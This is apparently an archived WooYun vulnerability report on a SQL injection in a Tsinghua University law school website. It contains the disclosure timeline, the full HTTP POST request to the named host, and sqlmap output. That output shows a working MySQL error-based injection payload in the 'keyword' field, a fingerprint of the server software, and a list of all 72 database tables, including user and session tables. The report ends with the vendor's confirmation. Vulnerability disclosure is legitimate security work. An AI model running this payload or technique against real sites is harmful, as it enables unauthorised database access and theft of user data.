WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
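2015-11-26: Details reported to the vendor; awaiting vendor handling
2015-11-26: Vendor has confirmed; details disclosed to the vendor only
2015-12-06: Details disclosed to core white hats and experts in related fields
2015-12-16: Details disclosed to regular white hats
2015-12-26: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public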
POST /homepage/index.php?cate_id=13&r=list/index HTTP/1.1
Content-Length: 334
Content-Type: application/x-www-form-urlencoded
Host: academic.law.tsinghua.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

keyword="*"
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: keyword=" AND (SELECT 5174 FROM(SELECT COUNT(*),CONCAT(0x71717a6271,(SELECT (ELT(5174=5174,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hrYI"
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.2.0
back-end DBMS: MySQL 5.0
Database: law
[72 tables]
+-----------------------------+
| bak_banner                  |
| bak_bannerclient            |
| bak_bannertrack             |
| bak_categories              |
| bak_components              |
| bak_contact_details         |
| bak_content                 |
| bak_content_frontpage       |
| bak_content_rating          |
| bak_core_acl_aro            |
| bak_core_acl_aro_groups     |
| bak_core_acl_aro_map        |
| bak_core_acl_aro_sections   |
| bak_core_acl_groups_aro_map |
| bak_core_log_items          |
| bak_core_log_searches       |
| bak_groups                  |
| bak_menu                    |
| bak_menu_types              |
| bak_messages                |
| bak_messages_cfg            |
| bak_migration_backlinks     |
| bak_modules                 |
| bak_modules_menu            |
| bak_newsfeeds               |
| bak_plugins                 |
| bak_poll_data               |
| bak_poll_date               |
| bak_poll_menu               |
| bak_polls                   |
| bak_sections                |
| bak_session                 |
| bak_stats_agents            |
| bak_templates_menu          |
| bak_users                   |
| bak_weblinks                |
| jos_banner                  |
| jos_bannerclient            |
| jos_bannertrack             |
| jos_categories              |
| jos_components              |
| jos_contact_details         |
| jos_content                 |
| jos_content_frontpage       |
| jos_content_rating          |
| jos_core_acl_aro            |
| jos_core_acl_aro_groups     |
| jos_core_acl_aro_map        |
| jos_core_acl_aro_sections   |
| jos_core_acl_groups_aro_map |
| jos_core_log_items          |
| jos_core_log_searches       |
| jos_groups                  |
| jos_menu                    |
| jos_menu_types              |
| jos_messages                |
| jos_messages_cfg            |
| jos_migration_backlinks     |
| jos_modules                 |
| jos_modules_menu            |
| jos_newsfeeds               |
| jos_plugins                 |
| jos_poll_data               |
| jos_poll_date               |
| jos_poll_menu               |
| jos_polls                   |
| jos_sections                |
| jos_session                 |
| jos_stats_agents            |
| jos_templates_menu          |
| jos_users                   |
| jos_weblinks                |
+-----------------------------+
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-11-26 16:06
Thank you for the reminder; we will fix it as soon as possible.
None yet